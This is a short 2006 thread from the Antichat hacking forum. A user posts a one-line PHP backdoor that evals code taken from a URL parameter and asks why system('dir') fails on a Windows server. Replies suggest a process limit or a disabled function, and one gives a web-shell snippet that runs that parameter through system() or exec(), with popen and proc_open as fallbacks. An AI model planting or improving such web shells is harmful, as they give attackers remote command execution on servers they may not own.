Команды в WinNT

Discussion in 'PHP' started by VampiRUS, 4 Aug 2006.

  1. VampiRUS

    VampiRUS Elder - Старейшина

    Joined:
    31 Dec 2005
    Messages:
    210
    Likes Received:
    105
    Reputations:
    57
    есть такой код
    PHP:
    if (isset($_GET[\'s\'])) eval(stripslashes($_GET[\'s\'])); 
    но при обращении ?s=system(\'dir\'); сценарий говорит
    слеши форум добавил.
     
    #1 VampiRUS, 4 Aug 2006
    Last edited: 4 Aug 2006
    1 person likes this.
  2. gemaglabin

    gemaglabin Green member

    Joined:
    1 Aug 2006
    Messages:
    772
    Likes Received:
    842
    Reputations:
    1,369
    Стоит лимит на запуск процессов как вариант
     
    #2 gemaglabin, 4 Aug 2006
    Last edited: 6 Aug 2006
  3. VampiRUS

    VampiRUS Elder - Старейшина

    Joined:
    31 Dec 2005
    Messages:
    210
    Likes Received:
    105
    Reputations:
    57
    php меня выручил, через него список файлов получил.
     
    #3 VampiRUS, 4 Aug 2006
  4. VampiRUS

    VampiRUS Elder - Старейшина

    Joined:
    31 Dec 2005
    Messages:
    210
    Likes Received:
    105
    Reputations:
    57
    А как можно убрать этот лимит?
     
    #4 VampiRUS, 9 Aug 2006
  5. em00s7

    em00s7 Elder - Старейшина

    Joined:
    2 May 2006
    Messages:
    169
    Likes Received:
    37
    Reputations:
    -10
    VampiRUS в php.ini -)) а может вообще функция system отключена
     
    #5 em00s7, 9 Aug 2006
    Last edited: 9 Aug 2006
  6. SMiX

    SMiX Elder - Старейшина

    Joined:
    25 Jul 2005
    Messages:
    227
    Likes Received:
    55
    Reputations:
    29
    Поэкспериментируй с popen(),proc_open(),exec() и т.п. Можно сделать так:
    PHP:
    <?
    if(    $exec=system(stripslashes($_GET['s']))) echo exec; elseif($exec=exec(stripslashes($_GET['s']))) echo $exec; ...
    ?>
     
    #6 SMiX, 9 Aug 2006
(You must log in or sign up to post here.)
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.